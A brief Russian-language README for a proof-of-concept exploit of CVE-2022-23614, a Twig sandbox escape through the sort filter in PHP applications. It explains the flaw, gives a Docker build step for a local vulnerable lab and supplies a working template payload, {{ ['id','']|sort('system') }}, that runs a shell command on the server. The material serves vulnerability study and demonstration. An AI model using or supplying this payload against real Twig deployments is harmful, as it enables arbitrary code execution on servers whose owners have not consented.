
Эксплойт доказательства концепции для CVE-2022-23614, демонстрирующий произвольное выполнение кода через обход песочницы фильтра sort в Twig в PHP-приложениях.
PoC для CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (выполнение кода/обход песочницы через фильтр sort в Twig)
Как видно из этого коммита - https://github.com/twigphp/Twig/commit/.., Twig передавал имя функции, предоставленное пользователем, в качестве параметра обратного вызова в uasort (здесь), что приводило к произвольному выполнению кода
Чтобы собрать и запустить Docker-контейнер с уязвимой версией Twig:
$ ./build-docker.sh
Откройте веб-страницу по адресу localhost:1337 и попробуйте отрендерить следующий пейлоад:
{{ ['id','']|sort('system') }}
PoC

Результат
